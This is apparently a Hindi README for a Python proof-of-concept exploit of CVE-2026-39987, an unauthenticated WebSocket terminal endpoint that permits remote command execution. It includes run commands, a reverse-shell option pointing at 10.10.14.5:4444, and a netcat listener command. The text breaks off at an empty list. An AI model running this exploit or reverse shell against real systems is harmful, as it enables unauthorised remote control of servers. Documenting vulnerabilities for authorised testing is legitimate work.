
CVE-2026-39987 के लिए Python proof-of-concept, जो remote command execution और reverse shell access प्राप्त करने के लिए unauthenticated WebSocket terminal endpoint का exploit करता है।
CVE-2026-39987 के लिए Proof of Concept, जो कमजोर WebSocket terminal endpoint के माध्यम से remote command execution को प्रदर्शित करता है।
अस्वीकरण: यह PoC केवल अधिकृत security testing और शैक्षिक उपयोग के लिए है। इसका उपयोग केवल उन सिस्टमों के विरुद्ध करें जिनके आप स्वामी हैं या जिनका परीक्षण करने के लिए आपके पास स्पष्ट अनुमति है।
यह कमजोरी एक unauthenticated उपयोगकर्ता को एप्लिकेशन के WebSocket terminal endpoint के साथ इंटरैक्ट करने और दूर से कमांड निष्पादित करने की अनुमति देती है।
यह PoC कनेक्ट होता है:
wss://<target>/terminal/ws
और WebSocket कनेक्शन के माध्यम से command execution को प्रदर्शित करता है।
इस PoC को विकसित/परीक्षण करते समय उपयोग किया गया लक्ष्य एक अधिकृत Hack The Box lab environment था।
websocket-clientआवश्यक लाइब्रेरी इंस्टॉल करें:
pip3 install websocket-client
python3 test.py <domain>
उदाहरण:
python3 test.py somesite.com
यह PoC WebSocket कनेक्शन स्थापित करता है और एक परीक्षण कमांड निष्पादित करता है।
यह PoC एक reverse-shell विकल्प का भी समर्थन करता है:
python3 exploit.py <domain> --reverse-shell <IP> --port <PORT>
उदाहरण:
python3 exploit.py somesite.com --reverse-shell 10.10.14.5 --port 4444
PoC निष्पादित करने से पहले listener प्रारंभ करें:
nc -lvnp 4444
यह एप्लिकेशन authentication की आवश्यकता के बिना एक WebSocket terminal endpoint को उजागर करता है।
यह PoC:
प्रारंभिक ws.recv() महत्वपूर्ण है क्योंकि कनेक्शन स्थापित करने के तुरंत बाद सर्वर shell prompt भेजता है।